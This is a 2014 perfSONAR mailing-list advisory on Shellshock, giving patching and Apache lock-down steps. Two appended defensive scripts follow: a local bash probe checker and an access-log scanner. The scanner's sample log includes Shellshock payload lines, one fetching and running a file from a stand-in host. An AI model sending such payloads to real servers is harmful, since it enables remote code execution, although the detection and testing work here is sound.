List: perfsonar-user (perfSONAR User Q&A and Other Discussion)

[perfsonar-user] Updated information on Shellshock for perfSONAR Toolkit Users

  • From: Jason Zurawski
  • To: perfsonar-user, perfsonar-announce
  • Subject: [perfsonar-user] Updated information on Shellshock for perfSONAR Toolkit Users
  • Date: Mon, 29 Sep 2014 17:58:22 -0400
Greetings;

We have 2 pieces of news to report on the ongoing shellshock situation:

1) As of this afternoon we have not seen any additional patches made by the
upstream vendors. For those playing the home game, here is the current list
of vulnerabilities:

> CVE-2014-6271 [Original vulnerability]
> CVE-2014-6277
> CVE-2014-6278
> CVE-2014-7169
> CVE-2014-7186
> CVE-2014-7187

Note that if you 'yum update'd last week, you should check again to be sure
you have the 'latest'; this is because new vulnerabilities were announced
right after the initial fix was released. We will continue to monitor the
situation and keep everyone posted on things we see. If you haven't enabled
yum auto-updating yet - consider reading this to do so:
http://www.perfsonar.net/about/faq/#Q53

Many of you have emailed to note that speed is the most important asset in
patching this vulnerability - even if you were 'fast' there is a chance you
could have been beaten. We would suggest verifying your systems to check for
rootkits (rkhunter and chkrootkit are popular products), and/or if someone is
running an IRC bot. When in doubt, yank it off the network and rebuild.

2) Working with community members, we have identified 2 ways to further
reduce the risk of perfSONAR Toolkit systems. Note that the risk does not
fully go away until bash is completely patched. These two approaches can help
in the meantime by reducing the visibility via the web:

a) A new RPM for version 3.3 (netinstall only) of the toolkit environment was
built, and is now available in yum - it is 3.3.2-18. The modification in
this update prevents the Perl interpreter from using bash for some of its
operations; some functionality will be reduced as a result. Please do the
following to get this update:

- yum update

- reboot the system

b) If you are using a 3.3 LiveCD, or a 3.4 (RC*) installation, we are working
on updated builds to address the problem as in part a). In the meantime, the
following modifications can be made to the apache configuration to lock down
*all* access to the Toolkit web interface:

- Open the configuration file:
/etc/httpd/conf.d/apache-toolkit_web_gui.conf

- Search for instances of these permissions:

> Order allow,deny
> Allow from all

- Modify the permissions to look like this (replacing the obvious
fake address with a real one, multiple 'Allow' lines are permitted):

> Order deny,allow
> Allow from AAA.BBB.CCC.DDD/16
> Deny from All

- restart httpd (sudo /etc/init.d/httpd restart) or reboot

Please reach out to us at

if you have additional questions on status of the vulnerability or our
response.

Thanks;

-jason
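Editor's added example (not part of Jason's message or of the perfSONAR project): a POSIX shell function that runs the widely circulated one-line probes for each of the six CVEs listed in the message against whatever `bash` is on PATH, so a toolkit admin can confirm that the `yum update` actually left them with a fully patched shell rather than the first, incomplete fix. It assumes `bash`, `env` and `mktemp` are available; the probe strings are the public test cases for CVE-2014-6271, CVE-2014-7169, Florian Weimer's CVE-2014-7186/7187 and Michal Zalewski's CVE-2014-6277/6278, none of which does anything beyond echoing a word, creating a file in a scratch directory, or crashing the child bash.

```sh
#!/bin/sh
# Added example, not from the perfSONAR project: probe the bash found on PATH
# with the public one-line tests for the six Shellshock CVEs. A fully patched
# bash passes every probe. Return value: number of failing probes (0 = no known
# issue), or 2 if there is no bash (or no scratch dir) to test with.

shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo "bash not found; cannot test"; return 2; }
    tmp=$(mktemp -d) || return 2
    vuln=0

    # CVE-2014-6271: code after the imported function body runs at startup.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "CVE-2014-6271: VULNERABLE"; vuln=$((vuln + 1)) ;;
        *)            echo "CVE-2014-6271: ok" ;;
    esac

    # CVE-2014-7169: incomplete first fix; leaked parser state turns 'echo date'
    # into a file named "echo" in the current directory instead of printing "date".
    ( cd "$tmp" && env 'x=() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$tmp/echo" ]; then
        echo "CVE-2014-7169: VULNERABLE"; vuln=$((vuln + 1))
    else
        echo "CVE-2014-7169: ok"
    fi

    # CVE-2014-7186: redir_stack overflow from many unterminated here-documents;
    # a vulnerable bash crashes (non-zero exit), a patched one only warns.
    if bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' >/dev/null 2>&1; then
        echo "CVE-2014-7186: ok"
    else
        echo "CVE-2014-7186: VULNERABLE"; vuln=$((vuln + 1))
    fi

    # CVE-2014-7187: word_lineno off-by-one with 200 nested for loops; crash = vulnerable.
    nested=$(i=1; while [ "$i" -le 200 ]; do echo "for x$i in ; do :"; i=$((i + 1)); done
             i=1; while [ "$i" -le 200 ]; do echo "done"; i=$((i + 1)); done)
    if printf '%s\n' "$nested" | bash >/dev/null 2>&1; then
        echo "CVE-2014-7187: ok"
    else
        echo "CVE-2014-7187: VULNERABLE"; vuln=$((vuln + 1))
    fi

    # CVE-2014-6277 / CVE-2014-6278: further parser bugs reachable through
    # function import; 6277 crashes bash, 6278 executes the trailing command.
    if ( cd "$tmp" && env X='() { x() { _; }; x() { _; } <<a; }' bash -c : >/dev/null 2>&1 ); then
        echo "CVE-2014-6277: ok"
    else
        echo "CVE-2014-6277: VULNERABLE"; vuln=$((vuln + 1))
    fi
    out=$( cd "$tmp" && env X='() { _; } >_[$($())] { echo vulnerable; }' bash -c : 2>/dev/null )
    case "$out" in
        *vulnerable*) echo "CVE-2014-6278: VULNERABLE"; vuln=$((vuln + 1)) ;;
        *)            echo "CVE-2014-6278: ok" ;;
    esac

    rm -rf "$tmp"
    return "$vuln"
}

# Stand-alone usage: run the probes and report the count without aborting.
if shellshock_check; then
    echo "all probes passed"
else
    echo "failing probes (2 = could not test): $?"
fi
```

Run it as the same user that runs the toolkit's CGI scripts if you can, since that is the bash an attacker would reach; a non-zero count means the 'latest' RPM has not actually landed yet, and a box that was exposed while any probe still fails is a candidate for the rootkit check and rebuild advice above.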


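A second editor's added example (again not from the message or the perfSONAR project), for the "you could have been beaten" point: the quickest evidence of whether a toolkit's web interface was actually probed is the Apache access log, because the Shellshock payload had to arrive in something Apache exports into the CGI environment (User-Agent, Referer, Cookie, the request line), and Apache logs the User-Agent and request line as sent. The function below greps a log for the function-definition prefix "() {", raw or URL-encoded; the sample log is constructed with RFC 5737 documentation addresses and is not real traffic.

```sh
#!/bin/sh
# Added example, not from the perfSONAR project: scan an Apache access log for
# Shellshock probes. Matching lines go to stderr, the match count to stdout.

scan_shellshock_probes() {
    log=$1
    # "()" then optional whitespace then "{", or its URL-encoded form
    # %28%29 [%20 or +]... %7B, case-insensitive for the hex digits.
    pattern='\(\)[[:space:]]*\{|%28%29(%20|[+])*%7[Bb]'
    grep -Ei -- "$pattern" "$log" >&2 || true
    grep -Eic -- "$pattern" "$log" || true   # grep -c prints 0 but exits 1 on no match
}

# Constructed sample log: two probe lines (one raw in the User-Agent, one
# URL-encoded in the query string) and two ordinary requests. Prints its path.
make_sample_log() {
    f=$(mktemp) || return 1
    cat >"$f" <<'EOF'
203.0.113.7 - - [25/Sep/2014:03:12:41 -0400] "GET /toolkit/ HTTP/1.1" 200 5120 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x; sh /tmp/x'"
198.51.100.22 - - [25/Sep/2014:03:14:02 -0400] "GET /toolkit/gui/services/?%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fping%20-c1%20198.51.100.22 HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
192.0.2.15 - - [25/Sep/2014:03:20:19 -0400] "GET /toolkit/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.15 - - [25/Sep/2014:03:20:20 -0400] "GET /toolkit/gui/services/ HTTP/1.1" 200 3311 "http://perfsonar.example.net/toolkit/" "Mozilla/5.0 (X11; Linux x86_64)"
EOF
    echo "$f"
}

# Stand-alone usage against the constructed sample; point it at
# /var/log/httpd/access_log* on a real toolkit instead.
log=$(make_sample_log)
echo "Shellshock probe lines: $(scan_shellshock_probes "$log")"
rm -f "$log"
```

A hit only proves an attempt, not a compromise, but any hit dated before the box was fully patched is the signal to run the rkhunter/chkrootkit pass and to look for unexpected outbound connections (the IRC bots mentioned above) before trusting the host again; a 200 response on a hit line is not reassuring, since the CGI ran either way.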